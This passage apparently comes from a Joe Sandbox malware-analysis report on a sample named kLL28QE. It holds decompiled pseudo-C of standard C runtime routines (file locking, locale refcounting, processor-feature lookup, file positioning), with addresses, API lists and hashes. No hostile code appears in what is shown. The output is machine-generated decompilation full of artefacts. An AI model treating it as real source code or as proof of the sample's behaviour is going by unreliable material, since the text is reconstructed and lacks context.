                                                                                                                                                                                                      				intOrPtr _t39;
                                                                                                                                                                                                      				intOrPtr _t40;
                                                                                                                                                                                                      				intOrPtr _t50;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t37 = __edx;
                                                                                                                                                                                                      				_push(8);
                                                                                                                                                                                                      				_push(0x421140);
                                                                                                                                                                                                      				E0040E1D8(__ebx, __edi, __esi);
                                                                                                                                                                                                      				_t39 = _a4;
                                                                                                                                                                                                      				_t50 = _t39;
                                                                                                                                                                                                      				_t51 = _t50 != 0;
                                                                                                                                                                                                      				if(_t50 != 0) {
                                                                                                                                                                                                      					E0040FB29(_t39);
                                                                                                                                                                                                      					_v8 = 0;
                                                                                                                                                                                                      					 *(_t39 + 0xc) =  *(_t39 + 0xc) & 0xffffffcf;
                                                                                                                                                                                                      					_t16 = E0040FA20(__edx, _t39, _t39);
                                                                                                                                                                                                      					__eflags = _t16 - 0xffffffff;
                                                                                                                                                                                                      					if(_t16 == 0xffffffff) {
                                                                                                                                                                                                      						L6:
                                                                                                                                                                                                      						_t17 = 0x4227e0;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t21 = E0040FA20(__edx, _t39, _t39);
                                                                                                                                                                                                      						__eflags = _t21 - 0xfffffffe;
                                                                                                                                                                                                      						if(_t21 == 0xfffffffe) {
                                                                                                                                                                                                      							goto L6;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t22 = E0040FA20(__edx, _t39, _t39);
                                                                                                                                                                                                      							_t17 = ((E0040FA20(_t37, _t39, _t39) & 0x0000001f) << 6) +  *((intOrPtr*)(0x423f60 + (_t22 >> 5) * 4));
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t9 = _t17 + 4; // 0xa80
                                                                                                                                                                                                      					 *(_t17 + 4) =  *_t9 & 0x000000fd;
                                                                                                                                                                                                      					_v8 = 0xfffffffe;
                                                                                                                                                                                                      					E0040C735(_t39);
                                                                                                                                                                                                      					_t19 = 0;
                                                                                                                                                                                                      					__eflags = 0;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t27 = E0040BFC1(_t51);
                                                                                                                                                                                                      					_t40 = 0x16;
                                                                                                                                                                                                      					 *_t27 = _t40;
                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                      					E0040E744(__edx, _t40, 0);
                                                                                                                                                                                                      					_t19 = _t40;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E0040E21D(_t19);
                                                                                                                                                                                                      			}













                                                                                                                                                                                                      0x0040c73d
                                                                                                                                                                                                      0x0040c690
                                                                                                                                                                                                      0x0040c692
                                                                                                                                                                                                      0x0040c697
                                                                                                                                                                                                      0x0040c69e
                                                                                                                                                                                                      0x0040c6a3
                                                                                                                                                                                                      0x0040c6a8
                                                                                                                                                                                                      0x0040c6aa
                                                                                                                                                                                                      0x0040c6c8
                                                                                                                                                                                                      0x0040c6ce
                                                                                                                                                                                                      0x0040c6d1
                                                                                                                                                                                                      0x0040c6d6
                                                                                                                                                                                                      0x0040c6dc
                                                                                                                                                                                                      0x0040c6df
                                                                                                                                                                                                      0x0040c70f
                                                                                                                                                                                                      0x0040c70f
                                                                                                                                                                                                      0x0040c6e1
                                                                                                                                                                                                      0x0040c6e2
                                                                                                                                                                                                      0x0040c6e8
                                                                                                                                                                                                      0x0040c6eb
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040c6ed
                                                                                                                                                                                                      0x0040c6ee
                                                                                                                                                                                                      0x0040c70b
                                                                                                                                                                                                      0x0040c70b
                                                                                                                                                                                                      0x0040c6eb
                                                                                                                                                                                                      0x0040c714
                                                                                                                                                                                                      0x0040c71b
                                                                                                                                                                                                      0x0040c71e
                                                                                                                                                                                                      0x0040c725
                                                                                                                                                                                                      0x0040c72a
                                                                                                                                                                                                      0x0040c72a
                                                                                                                                                                                                      0x0040c6ac
                                                                                                                                                                                                      0x0040c6ac
                                                                                                                                                                                                      0x0040c6b3
                                                                                                                                                                                                      0x0040c6b4
                                                                                                                                                                                                      0x0040c6b6
                                                                                                                                                                                                      0x0040c6b7
                                                                                                                                                                                                      0x0040c6b8
                                                                                                                                                                                                      0x0040c6b9
                                                                                                                                                                                                      0x0040c6ba
                                                                                                                                                                                                      0x0040c6bb
                                                                                                                                                                                                      0x0040c6c3
                                                                                                                                                                                                      0x0040c6c3
                                                                                                                                                                                                      0x0040c731

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • __lock_file.LIBCMT ref: 0040C6C8
                                                                                                                                                                                                      • __fileno.LIBCMT ref: 0040C6D6
                                                                                                                                                                                                      • __fileno.LIBCMT ref: 0040C6E2
                                                                                                                                                                                                      • __fileno.LIBCMT ref: 0040C6EE
                                                                                                                                                                                                      • __fileno.LIBCMT ref: 0040C6FE
                                                                                                                                                                                                        • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                                                                                        • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.408060927.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.000000000044D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_kLL28QE.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2805327698-0
                                                                                                                                                                                                      • Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                                                                                                                      • Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 89%
                                                                                                                                                                                                      			E00413FCC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                      				signed int _t15;
                                                                                                                                                                                                      				LONG* _t21;
                                                                                                                                                                                                      				long _t23;
                                                                                                                                                                                                      				void* _t31;
                                                                                                                                                                                                      				LONG* _t33;
                                                                                                                                                                                                      				void* _t34;
                                                                                                                                                                                                      				void* _t35;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t35 = __eflags;
                                                                                                                                                                                                      				_t29 = __edx;
                                                                                                                                                                                                      				_t25 = __ebx;
                                                                                                                                                                                                      				_push(0xc);
                                                                                                                                                                                                      				_push(0x421490);
                                                                                                                                                                                                      				E0040E1D8(__ebx, __edi, __esi);
                                                                                                                                                                                                      				_t31 = E00410735(__ebx, __edx, __edi, _t35);
                                                                                                                                                                                                      				_t15 =  *0x422e34; // 0xfffffffe
                                                                                                                                                                                                      				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                                                                                                                                                                                      					E0040D6E0(_t25, 0xd);
                                                                                                                                                                                                      					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                                                                                                                                                                                      					_t33 =  *(_t31 + 0x68);
                                                                                                                                                                                                      					 *(_t34 - 0x1c) = _t33;
                                                                                                                                                                                                      					__eflags = _t33 -  *0x422d38; // 0x49b1648
                                                                                                                                                                                                      					if(__eflags != 0) {
                                                                                                                                                                                                      						__eflags = _t33;
                                                                                                                                                                                                      						if(_t33 != 0) {
                                                                                                                                                                                                      							_t23 = InterlockedDecrement(_t33);
                                                                                                                                                                                                      							__eflags = _t23;
                                                                                                                                                                                                      							if(_t23 == 0) {
                                                                                                                                                                                                      								__eflags = _t33 - 0x422910;
                                                                                                                                                                                                      								if(__eflags != 0) {
                                                                                                                                                                                                      									_push(_t33);
                                                                                                                                                                                                      									E0040B6B5(_t25, _t31, _t33, __eflags);
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t21 =  *0x422d38; // 0x49b1648
                                                                                                                                                                                                      						 *(_t31 + 0x68) = _t21;
                                                                                                                                                                                                      						_t33 =  *0x422d38; // 0x49b1648
                                                                                                                                                                                                      						 *(_t34 - 0x1c) = _t33;
                                                                                                                                                                                                      						InterlockedIncrement(_t33);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					 *(_t34 - 4) = 0xfffffffe;
                                                                                                                                                                                                      					E00414067();
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t33 =  *(_t31 + 0x68);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(_t33 == 0) {
                                                                                                                                                                                                      					E0040E79A(_t29, _t31, 0x20);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E0040E21D(_t33);
                                                                                                                                                                                                      			}










                                                                                                                                                                                                      0x00413fcc
                                                                                                                                                                                                      0x00413fcc
                                                                                                                                                                                                      0x00413fcc
                                                                                                                                                                                                      0x00413fcc
                                                                                                                                                                                                      0x00413fce
                                                                                                                                                                                                      0x00413fd3
                                                                                                                                                                                                      0x00413fdd
                                                                                                                                                                                                      0x00413fdf
                                                                                                                                                                                                      0x00413fe7
                                                                                                                                                                                                      0x00414008
                                                                                                                                                                                                      0x0041400e
                                                                                                                                                                                                      0x00414012
                                                                                                                                                                                                      0x00414015
                                                                                                                                                                                                      0x00414018
                                                                                                                                                                                                      0x0041401e
                                                                                                                                                                                                      0x00414020
                                                                                                                                                                                                      0x00414022
                                                                                                                                                                                                      0x00414025
                                                                                                                                                                                                      0x0041402b
                                                                                                                                                                                                      0x0041402d
                                                                                                                                                                                                      0x0041402f
                                                                                                                                                                                                      0x00414035
                                                                                                                                                                                                      0x00414037
                                                                                                                                                                                                      0x00414038
                                                                                                                                                                                                      0x0041403d
                                                                                                                                                                                                      0x00414035
                                                                                                                                                                                                      0x0041402d
                                                                                                                                                                                                      0x0041403e
                                                                                                                                                                                                      0x00414043
                                                                                                                                                                                                      0x00414046
                                                                                                                                                                                                      0x0041404c
                                                                                                                                                                                                      0x00414050
                                                                                                                                                                                                      0x00414050
                                                                                                                                                                                                      0x00414056
                                                                                                                                                                                                      0x0041405d
                                                                                                                                                                                                      0x00413fef
                                                                                                                                                                                                      0x00413fef
                                                                                                                                                                                                      0x00413fef
                                                                                                                                                                                                      0x00413ff4
                                                                                                                                                                                                      0x00413ff8
                                                                                                                                                                                                      0x00413ffd
                                                                                                                                                                                                      0x00414005

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • __getptd.LIBCMT ref: 00413FD8
                                                                                                                                                                                                        • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                                                                                                                        • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                                                                                                                      • __amsg_exit.LIBCMT ref: 00413FF8
                                                                                                                                                                                                      • __lock.LIBCMT ref: 00414008
                                                                                                                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 00414025
                                                                                                                                                                                                      • InterlockedIncrement.KERNEL32(049B1648), ref: 00414050
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.408060927.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.000000000044D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_kLL28QE.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 4271482742-0
                                                                                                                                                                                                      • Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                                                                                                                      • Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 65%
                                                                                                                                                                                                      			E00413610() {
                                                                                                                                                                                                      				signed long long _v12;
                                                                                                                                                                                                      				signed int _v20;
                                                                                                                                                                                                      				signed long long _v28;
                                                                                                                                                                                                      				signed char _t8;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t8 = GetModuleHandleA("KERNEL32");
                                                                                                                                                                                                      				if(_t8 == 0) {
                                                                                                                                                                                                      					L6:
                                                                                                                                                                                                      					_v20 =  *0x41fb50;
                                                                                                                                                                                                      					_v28 =  *0x41fb48;
                                                                                                                                                                                                      					asm("fsubr qword [ebp-0x18]");
                                                                                                                                                                                                      					_v12 = _v28 / _v20 * _v20;
                                                                                                                                                                                                      					asm("fld1");
                                                                                                                                                                                                      					asm("fcomp qword [ebp-0x8]");
                                                                                                                                                                                                      					asm("fnstsw ax");
                                                                                                                                                                                                      					if((_t8 & 0x00000005) != 0) {
                                                                                                                                                                                                      						return 0;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						return 1;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
                                                                                                                                                                                                      					if(__eax == 0) {
                                                                                                                                                                                                      						goto L6;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_push(0);
                                                                                                                                                                                                      						return __eax;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}







                                                                                                                                                                                                      0x00413615
                                                                                                                                                                                                      0x0041361d
                                                                                                                                                                                                      0x00413634
                                                                                                                                                                                                      0x004135e0
                                                                                                                                                                                                      0x004135e9
                                                                                                                                                                                                      0x004135f5
                                                                                                                                                                                                      0x004135f8
                                                                                                                                                                                                      0x004135fb
                                                                                                                                                                                                      0x004135fd
                                                                                                                                                                                                      0x00413600
                                                                                                                                                                                                      0x00413605
                                                                                                                                                                                                      0x0041360f
                                                                                                                                                                                                      0x00413607
                                                                                                                                                                                                      0x0041360b
                                                                                                                                                                                                      0x0041360b
                                                                                                                                                                                                      0x0041361f
                                                                                                                                                                                                      0x00413625
                                                                                                                                                                                                      0x0041362d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0041362f
                                                                                                                                                                                                      0x0041362f
                                                                                                                                                                                                      0x00413633
                                                                                                                                                                                                      0x00413633
                                                                                                                                                                                                      0x0041362d

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.408060927.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000006.00000002.408060927.000000000044D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_kLL28QE.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                                                                                      • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                                                                                                      • API String ID: 1646373207-3105848591
                                                                                                                                                                                                      • Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                                                                                                      • Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 86%
                                                                                                                                                                                                      			E0040C748(void* __edx, void* __esi, char _a4) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				signed int _v12;
                                                                                                                                                                                                      				signed int _v16;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __ebp;
                                                                                                                                                                                                      				signed int _t70;
                                                                                                                                                                                                      				signed int _t71;
                                                                                                                                                                                                      				intOrPtr _t73;
                                                                                                                                                                                                      				signed int _t75;
                                                                                                                                                                                                      				signed int _t81;
                                                                                                                                                                                                      				char _t82;
                                                                                                                                                                                                      				signed int _t84;
                                                                                                                                                                                                      				intOrPtr* _t86;
                                                                                                                                                                                                      				signed int _t87;
                                                                                                                                                                                                      				intOrPtr* _t90;
                                                                                                                                                                                                      				signed int _t92;
                                                                                                                                                                                                      				signed int _t94;
                                                                                                                                                                                                      				void* _t96;
                                                                                                                                                                                                      				signed char _t98;
                                                                                                                                                                                                      				signed int _t99;
                                                                                                                                                                                                      				intOrPtr _t102;
                                                                                                                                                                                                      				signed int _t103;
                                                                                                                                                                                                      				intOrPtr* _t104;
                                                                                                                                                                                                      				signed int _t111;
                                                                                                                                                                                                      				signed int _t114;
                                                                                                                                                                                                      				intOrPtr _t115;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t105 = __esi;
                                                                                                                                                                                                      				_t97 = __edx;
                                                                                                                                                                                                      				_t104 = _a4;
                                                                                                                                                                                                      				_t87 = 0;
                                                                                                                                                                                                      				_t121 = _t104;
                                                                                                                                                                                                      				if(_t104 != 0) {
                                                                                                                                                                                                      					_t70 = E0040FA20(__edx, _t104, _t104);
                                                                                                                                                                                                      					__eflags =  *(_t104 + 4);
                                                                                                                                                                                                      					_v8 = _t70;
                                                                                                                                                                                                      					if(__eflags < 0) {
                                                                                                                                                                                                      						 *(_t104 + 4) = 0;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_push(1);
                                                                                                                                                                                                      					_push(_t87);
                                                                                                                                                                                                      					_push(_t70);
                                                                                                                                                                                                      					_t71 = E00411939(_t87, _t97, _t104, _t105, __eflags);
                                                                                                                                                                                                      					__eflags = _t71 - _t87;
                                                                                                                                                                                                      					_v12 = _t71;
                                                                                                                                                                                                      					if(_t71 < _t87) {
                                                                                                                                                                                                      						L2:
                                                                                                                                                                                                      						return _t71 | 0xffffffff;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t98 =  *(_t104 + 0xc);
                                                                                                                                                                                                      						__eflags = _t98 & 0x00000108;
                                                                                                                                                                                                      						if((_t98 & 0x00000108) != 0) {
                                                                                                                                                                                                      							_t73 =  *_t104;
                                                                                                                                                                                                      							_t92 =  *(_t104 + 8);
                                                                                                                                                                                                      							_push(_t105);
                                                                                                                                                                                                      							_v16 = _t73 - _t92;
                                                                                                                                                                                                      							__eflags = _t98 & 0x00000003;
                                                                                                                                                                                                      							if((_t98 & 0x00000003) == 0) {
                                                                                                                                                                                                      								__eflags = _t98;
                                                                                                                                                                                                      								if(__eflags < 0) {
                                                                                                                                                                                                      									L15:
                                                                                                                                                                                                      									__eflags = _v12 - _t87;
                                                                                                                                                                                                      									if(_v12 != _t87) {
                                                                                                                                                                                                      										__eflags =  *(_t104 + 0xc) & 0x00000001;
                                                                                                                                                                                                      										if(( *(_t104 + 0xc) & 0x00000001) == 0) {
                                                                                                                                                                                                      											L40:
                                                                                                                                                                                                      											_t75 = _v16 + _v12;
                                                                                                                                                                                                      											__eflags = _t75;
                                                                                                                                                                                                      											L41:
                                                                                                                                                                                                      											return _t75;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										_t99 =  *(_t104 + 4);
                                                                                                                                                                                                      										__eflags = _t99 - _t87;
                                                                                                                                                                                                      										if(_t99 != _t87) {
                                                                                                                                                                                                      											_t90 = 0x423f60 + (_v8 >> 5) * 4;
                                                                                                                                                                                                      											_a4 = _t73 - _t92 + _t99;
                                                                                                                                                                                                      											_t111 = (_v8 & 0x0000001f) << 6;
                                                                                                                                                                                                      											__eflags =  *( *_t90 + _t111 + 4) & 0x00000080;
                                                                                                                                                                                                      											if(__eflags == 0) {
                                                                                                                                                                                                      												L39:
                                                                                                                                                                                                      												_t66 =  &_v12;
                                                                                                                                                                                                      												 *_t66 = _v12 - _a4;
                                                                                                                                                                                                      												__eflags =  *_t66;
                                                                                                                                                                                                      												goto L40;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											_push(2);
                                                                                                                                                                                                      											_push(0);
                                                                                                                                                                                                      											_push(_v8);
                                                                                                                                                                                                      											__eflags = E00411939(_t90, _t99, _t104, _t111, __eflags) - _v12;
                                                                                                                                                                                                      											if(__eflags != 0) {
                                                                                                                                                                                                      												_push(0);
                                                                                                                                                                                                      												_push(_v12);
                                                                                                                                                                                                      												_push(_v8);
                                                                                                                                                                                                      												_t81 = E00411939(_t90, _t99, _t104, _t111, __eflags);
                                                                                                                                                                                                      												__eflags = _t81;
                                                                                                                                                                                                      												if(_t81 >= 0) {
                                                                                                                                                                                                      													_t82 = 0x200;
                                                                                                                                                                                                      													__eflags = _a4 - 0x200;
                                                                                                                                                                                                      													if(_a4 > 0x200) {
                                                                                                                                                                                                      														L35:
                                                                                                                                                                                                      														_t82 =  *((intOrPtr*)(_t104 + 0x18));
                                                                                                                                                                                                      														L36:
                                                                                                                                                                                                      														_a4 = _t82;
                                                                                                                                                                                                      														__eflags =  *( *_t90 + _t111 + 4) & 0x00000004;
                                                                                                                                                                                                      														L37:
                                                                                                                                                                                                      														if(__eflags != 0) {
                                                                                                                                                                                                      															_t63 =  &_a4;
                                                                                                                                                                                                      															 *_t63 = _a4 + 1;
                                                                                                                                                                                                      															__eflags =  *_t63;
                                                                                                                                                                                                      														}
                                                                                                                                                                                                      														goto L39;
                                                                                                                                                                                                      													}
                                                                                                                                                                                                      													_t94 =  *(_t104 + 0xc);
                                                                                                                                                                                                      													__eflags = _t94 & 0x00000008;
                                                                                                                                                                                                      													if((_t94 & 0x00000008) == 0) {
                                                                                                                                                                                                      														goto L35;
                                                                                                                                                                                                      													}
                                                                                                                                                                                                      													__eflags = _t94 & 0x00000400;
                                                                                                                                                                                                      													if((_t94 & 0x00000400) == 0) {
                                                                                                                                                                                                      														goto L36;
                                                                                                                                                                                                      													}
                                                                                                                                                                                                      													goto L35;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												L31:
                                                                                                                                                                                                      												_t75 = _t81 | 0xffffffff;
                                                                                                                                                                                                      												goto L41;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											_t84 =  *(_t104 + 8);
                                                                                                                                                                                                      											_t96 = _a4 + _t84;
                                                                                                                                                                                                      											while(1) {
                                                                                                                                                                                                      												__eflags = _t84 - _t96;
                                                                                                                                                                                                      												if(_t84 >= _t96) {
                                                                                                                                                                                                      													break;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												__eflags =  *_t84 - 0xa;
                                                                                                                                                                                                      												if( *_t84 == 0xa) {
                                                                                                                                                                                                      													_t44 =  &_a4;
                                                                                                                                                                                                      													 *_t44 = _a4 + 1;
                                                                                                                                                                                                      													__eflags =  *_t44;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												_t84 = _t84 + 1;
                                                                                                                                                                                                      												__eflags = _t84;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											__eflags =  *(_t104 + 0xc) & 0x00002000;
                                                                                                                                                                                                      											goto L37;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										_v16 = _t87;
                                                                                                                                                                                                      										goto L40;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									_t75 = _v16;
                                                                                                                                                                                                      									goto L41;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_t81 = E0040BFC1(__eflags);
                                                                                                                                                                                                      								 *_t81 = 0x16;
                                                                                                                                                                                                      								goto L31;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t102 =  *((intOrPtr*)(0x423f60 + (_v8 >> 5) * 4));
                                                                                                                                                                                                      							_t114 = (_v8 & 0x0000001f) << 6;
                                                                                                                                                                                                      							__eflags =  *(_t102 + _t114 + 4) & 0x00000080;
                                                                                                                                                                                                      							if(( *(_t102 + _t114 + 4) & 0x00000080) == 0) {
                                                                                                                                                                                                      								goto L15;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t103 = _t92;
                                                                                                                                                                                                      							__eflags = _t103 - _t73;
                                                                                                                                                                                                      							if(_t103 >= _t73) {
                                                                                                                                                                                                      								goto L15;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t115 = _t73;
                                                                                                                                                                                                      							do {
                                                                                                                                                                                                      								__eflags =  *_t103 - 0xa;
                                                                                                                                                                                                      								if( *_t103 == 0xa) {
                                                                                                                                                                                                      									_v16 = _v16 + 1;
                                                                                                                                                                                                      									_t87 = 0;
                                                                                                                                                                                                      									__eflags = 0;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_t103 = _t103 + 1;
                                                                                                                                                                                                      								__eflags = _t103 - _t115;
                                                                                                                                                                                                      							} while (_t103 < _t115);
                                                                                                                                                                                                      							goto L15;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						return _t71 -  *(_t104 + 4);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t86 = E0040BFC1(_t121);
                                                                                                                                                                                                      				_push(0);
                                                                                                                                                                                                      				_push(0);
                                                                                                                                                                                                      				_push(0);
                                                                                                                                                                                                      				_push(0);
                                                                                                                                                                                                      				_push(0);
                                                                                                                                                                                                      				 *_t86 = 0x16;
                                                                                                                                                                                                      				_t71 = E0040E744(__edx, _t104, __esi);
                                                                                                                                                                                                      				goto L2;
                                                                                                                                                                                                      			}






























                                                                                                                                                                                                      0x0040c748
                                                                                                                                                                                                      0x0040c748
                                                                                                                                                                                                      0x0040c752
                                                                                                                                                                                                      0x0040c755
                                                                                                                                                                                                      0x0040c757
                                                                                                                                                                                                      0x0040c759
                                                                                                                                                                                                      0x0040c77c
                                                                                                                                                                                                      0x0040c781
                                                                                                                                                                                                      0x0040c785
                                                                                                                                                                                                      0x0040c788
                                                                                                                                                                                                      0x0040c78a
                                                                                                                                                                                                      0x0040c78a
                                                                                                                                                                                                      0x0040c78d
                                                                                                                                                                                                      0x0040c78f
                                                                                                                                                                                                      0x0040c790
                                                                                                                                                                                                      0x0040c791
                                                                                                                                                                                                      0x0040c799
                                                                                                                                                                                                      0x0040c79b
                                                                                                                                                                                                      0x0040c79e
                                                                                                                                                                                                      0x0040c773
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040c7a0
                                                                                                                                                                                                      0x0040c7a0
                                                                                                                                                                                                      0x0040c7a3
                                                                                                                                                                                                      0x0040c7a9
                                                                                                                                                                                                      0x0040c7b3
                                                                                                                                                                                                      0x0040c7b5
                                                                                                                                                                                                      0x0040c7b8
                                                                                                                                                                                                      0x0040c7bd
                                                                                                                                                                                                      0x0040c7c0
                                                                                                                                                                                                      0x0040c7c3
                                                                                                                                                                                                      0x0040c806
                                                                                                                                                                                                      0x0040c808
                                                                                                                                                                                                      0x0040c7f9
                                                                                                                                                                                                      0x0040c7f9
                                                                                                                                                                                                      0x0040c7fc
                                                                                                                                                                                                      0x0040c81a
                                                                                                                                                                                                      0x0040c81e
                                                                                                                                                                                                      0x0040c8d8
                                                                                                                                                                                                      0x0040c8de
                                                                                                                                                                                                      0x0040c8de
                                                                                                                                                                                                      0x0040c8e0
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x0040c8e0
                                                                                                                                                                                                      0x0040c824
                                                                                                                                                                                                      0x0040c827
                                                                                                                                                                                                      0x0040c829
                                                                                                                                                                                                      0x0040c843
                                                                                                                                                                                                      0x0040c84a
                                                                                                                                                                                                      0x0040c84f
                                                                                                                                                                                                      0x0040c852
                                                                                                                                                                                                      0x0040c857
                                                                                                                                                                                                      0x0040c8d2
